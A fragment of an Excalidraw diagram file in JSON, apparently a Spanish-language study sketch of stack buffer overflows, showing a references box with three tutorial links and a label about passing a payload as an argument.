			"type": "text",
			"version": 260,
			"versionNonce": 8893656,
			"isDeleted": false,
			"id": "cFOUsuwY",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 719.5314970771126,
			"y": 909.1561372060767,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 153.44281005859375,
			"height": 34.06212489600549,
			"seed": 2015850415,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961292,
			"link": null,
			"locked": false,
			"fontSize": 27.249699916804396,
			"fontFamily": 1,
			"text": "Referencias",
			"rawText": "Referencias",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Referencias",
			"lineHeight": 1.25,
			"baseline": 23
		},
		{
			"type": "text",
			"version": 198,
			"versionNonce": 1956422824,
			"isDeleted": false,
			"id": "sAehMZOM",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 721.7083608900737,
			"y": 967.931460156025,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 917.9415893554688,
			"height": 108.31006467535877,
			"seed": 1550926991,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961293,
			"link": "https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/https://github.com/muhammet-mucahit/Security-Exerciseshttps://0xrick.github.io/binary-exploitation/bof5/",
			"locked": false,
			"fontSize": 17.329610348057404,
			"fontFamily": 1,
			"text": " https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/\n\n https://github.com/muhammet-mucahit/Security-Exercises\n\n https://0xrick.github.io/binary-exploitation/bof5/",
			"rawText": " https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/\n\n https://github.com/muhammet-mucahit/Security-Exercises\n\n https://0xrick.github.io/binary-exploitation/bof5/",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": " https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/\n\n https://github.com/muhammet-mucahit/Security-Exercises\n\n https://0xrick.github.io/binary-exploitation/bof5/",
			"lineHeight": 1.25,
			"baseline": 102
		},
		{
			"type": "arrow",
			"version": 259,
			"versionNonce": 238748120,
			"isDeleted": false,
			"id": "T692gqJvdejM2NRwG8_ik",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1189.8433683545843,
			"y": 362.7909170465897,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 261.94965882850624,
			"height": 20.056386140894688,
			"seed": 572698584,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727609855119,
			"link": null,
			"locked": false,
			"startBinding": {
				"elementId": "XruaClq2",
				"focus": -0.5407313049557044,
				"gap": 25.999720110533644
			},
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					-261.94965882850624,
					20.056386140894688
				]
			]
		},
		{
			"type": "text",
			"version": 519,
			"versionNonce": 1403380392,
			"isDeleted": false,
			"id": "dfPI9RPC",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 968.9854720101677,
			"y": 338.2624102397787,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 192.02200317382812,
			"height": 15.671798884512834,
			"seed": 1564104360,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727609857343,
			"link": null,
			"locked": false,
			"fontSize": 12.537439107610266,
			"fontFamily": 1,
			"text": "Pasar payload como argumento",
			"rawText": "Pasar payload como argumento",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Pasar payload como argumento",
			"lineHeight": 1.25,
			"baseline": 10
		}
	],
	"appState": {
		"theme": "light",
		"viewBackgroundColor": "#ffffff",
		"currentItemStrokeColor": "#1e1e1e",
		"currentItemBackgroundColor": "transparent",
		"currentItemFillStyle": "solid",
		"currentItemStrokeWidth": 2,
		"currentItemStrokeStyle": "solid",
		"currentItemRoughness": 1,
		"currentItemOpacity": 90,
		"currentItemFontFamily": 1,
		"currentItemFontSize": 16,
		"currentItemTextAlign": "left",
		"currentItemStartArrowhead": null,
		"currentItemEndArrowhead": "arrow",
		"scrollX": 1486.9147278158139,
		"scrollY": 1175.4409553203518,
		"zoom": {
			"value": 0.30000000000000004
		},
		"currentItemRoundness": "round",
		"gridSize": null,
		"gridColor": {
			"Bold": "#C9C9C9FF",
			"Regular": "#EDEDEDFF"
		},
		"currentStrokeOptions": null,
		"previousGridSize": null,
		"frameRendering": {
			"enabled": true,
			"clip": true,
			"name": true,
			"outline": true
		}
	},
	"prevTextMode": "parsed",
	"files": {}
}